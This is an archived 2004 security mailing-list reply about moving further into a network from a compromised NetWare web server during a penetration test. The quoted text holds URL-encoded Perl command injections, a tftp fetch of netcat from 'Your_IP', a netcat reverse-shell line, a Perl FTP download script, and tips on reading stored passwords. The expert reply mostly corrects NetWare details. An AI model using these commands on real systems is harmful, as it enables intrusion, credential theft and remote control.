Re: Escalating from Netware box

From: Francois Labreque (flabreq@ca.ibm.com)
Date: Mon Aug 23 2004 - 11:28:20 EDT


"Dave Nuull" <gotodevnull@hotmail.com> wrote on 2004-08-15 12:02:35:

> McKenna Henage or Beme Lee wrote:

> >I'm wrapping up a pen-test and I've gained access to a
> >NetWare-Enterprise-Web-Server/5.1 box through the ability to run Perl
> >commands using specially crafted URLs (e.g.,
> >"perl/-e%20system(%22dir%22);"). I wrote a program in Perl that crafts
the
> >URLs to allow me to easily read any file on the server, write to any
file,
> >or execute any command. However, without any Novell experience (I am a
MS
> >and Linux guy), I am unable to escalate to the point of being able to
> >attack
> >other systems on the client's network.

> Aside question: If perl -e is a command line option, why does a simple
'dir'
> not work? Or a cmd%20/C%20dir?

Because "dir" does not work on a Novell server. Nor does "CMD.EXE".
Novell servers run their own OS.

> >Any suggestions for ways I can use this Netware box to further exploit
> >their
> >networks would be very much appreciated. In particular, I'm interested
in
> >discovering what other devices are on their network (since I can only
see
> >their Netware box from the Internet), performing port scans,
vulnerability
> >scans, etc. I need to be nice to the server since it is in production,
so
> >I'm trying not to experiment too much on their machine and risk
bringing it
> >down (already crashed it once!).

> If you can execute on the remote server, and if there are any 'closed'
ports
> (i.e not filtered) then have you tried to tftp up a nc.exe and shovel a
> shell back to your attack host?
> i.e.
> "perl/-e%20system(%22tftp%20-i%20Your_IP%20get%20nc.exe%22);"
> "perl/-e%20system(%22nc.exe%20-e%20cmd.exe%20Your_IP%20Your_Port%22);"

You would have to send an .NLM - The Novell executable format - Win32 or
DOS .EXE formats do not run on Netware.

>
> If as you say below you cant find the tftp client, what about perl's FTP
> module:
> This one does not contain any " or ' chars so you could echo all the
lines
> into
> a file on the remote server and run from the command line.

> use Net::FTP;
> $ftp=Net::FTP->new($ARGV[0]);
> $ftp->login($ARGV[1],$ARGV[2]);
> $ftp->binary();
> $ftp->get($ARGV[3]);
> $ftp->quit();

> >I've already done some research on Netware, including listening to
RFP's
> >Black Hat talk on Netware, and reading the "Novell Hacking FAQ"
available
> >on
> >the web. Unfortunately most resources I've found refer to Netware 2.x,
3.x,
> >and 4.x. Here is what I've been able to gain so far, thanks to having
> >partial access to files on the system using directory traversal:

> If you have partial access to files (i.e at least read access), could
you
> not tftp complete files back to your attack host?

There is usually no TFTP client on a Netware server. He said he could
read the files in a browser.

> This again assumes they have not
> configured restrictive outbound filtering on their firewall. If you can
> find their internal mail server, you could craft some SMTP commands and
> mail them to yourself instead :-)

Assuming he can use the Perl command interface on the Netware server to
connect to the SMTP server.

> >-Internal IP address
> >-IPX servers (running the command “display ipx servers”)
> >-See unencrypted passwords in /system/autoexec.ncf and /etc/netinfo.cfg
> >(and
> >to crack a password in /Novonyx/suitespot/admin-serv/config/ADMPW)
> >-Successfully ping out to a device on the Internet (unfortunately it
> >appears
> >to be continuous, because I wasn’t able to stop it)
> >-…and pretty much anything else that is in a file, or almost any
command
> >
> >I have run into some limits:
> >
> >-Any request I make (to read/write a file or execute a command) is
limited
> >in character length, hampering my ability to execute an elaborate Perl
> >program on the box or even to read some files that are too far down the
> >directory tree

> If you have a command length limits, perhaps try to create a .bat file
on
> the remote server using echo appends and splitting the command into
smaller
> sections.
> "perl/-e%20system(%22echo%20cd%20some_path%20>>mycmd.bat%22);"
> "perl/-e%20system(%22echo%20run_command%20>>mycmd.bat%22);"
> "perl/-e%20system(%22mycmd.bat%22);"

.BAT files do not work on Netware servers. He could create an .NCF which
is basically the same thing as a .BAT but is limited to the commands that
you can execute from the server prompt.

>
> >-Haven't found a way to send some characters such as " and ', even
after
> >trying everything I could think of (encoding, double encoding, etc.).
Wish
> >I
> >could do that because then I could essentially start writing a new Perl
> >script to their machine and overcome the character limitation just
> >mentioned, and potentially find a way to upload a Perl port scanner of
some
> >sort.

> If you have perl interpreter access, you could use the pack/unpack
functions
> to decode the " or ' chars into decimal/hex/octal and using one liners
> unpack the chars on the remote host. ref: ascii chart for char->hex
values
> i.e.
> C:\>perl -e $a=pack(H6,222027);print$a;
> " '

> >-An inability to correctly view all files. Since I'm getting the files
fed
> >back in a web browser, I can sometimes only see the first parts of a
file
> >(up to 500K or so), and have trouble downloading binaries.
> >
> >-An inability to see the entire results of a command run on the system.
I
> >can run a command, but then to see the results I have to open
> >/etc/console.log and read the last few lines (so I can't always see the
> >entire results, because it appears to be cut off in the log).

> Do command output redirections into your own log file not work on the
> server?

Exactly. On a Netware server, if CONLOG.NLM is running ALL command output
is duplicated in etc/console.log, if CONLOG.NLM is not running then the
output will only appear on the server's physical console. There is a way
to change the size of /etc/console.log at the command line, so you could
unload CONLOG and LOAD CONLOG with the proper parameter so that you get a
couple of MBs of logs.

> >-I don’t even know how to download files to the Netware box. I have
been
> >unable to determine if it has a HTTP or FTP client I can use to pull
down a
> >trojan/backdoor program, netcat, or anything else.
> >-Some blockage at the firewall (?). For example, I tried loading the
remote
> >console and then accessing it remotely, but it appears to be blocked at
the
> >firewall since I can’t get in. If it were a Linux/Unix/Windows box then
I’d
> >know how to download a SSH client and reverse-tunnel a connection out
> >through the firewall, but I’m clueless on Netware.
> >
> >Thanks in advance for any suggestions you can provide in the next
couple
> >days.
> >
> >Beme Lee

[Hotmail spam snipped.]

___________________________________________________
François Labrèque, CCNP
Technical Leader, Network Support
IBM Global Services
Tel.:(514)-964-2150 Fax.:(514)-964-1708
flabreq@ca.ibm.com

In the future, performance will be measured by the size of your pipe!
       - Dogbert, on networking

------------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. All of our class sizes are
guaranteed to be 12 students or less to facilitate one-on-one interaction
with one of our expert instructors. Check out our Advanced Hacking course,
learn to write exploits and attack security infrastructure. Attend a course
taught by an expert instructor with years of in-the-field pen testing
experience in our state of the art hacking lab. Master the skills of an
Ethical Hacker to better assess the security of your organization.

http://www.securityfocus.com/sponsor/InfoSecInstitute_pen-test_040817
-------------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:00 EDT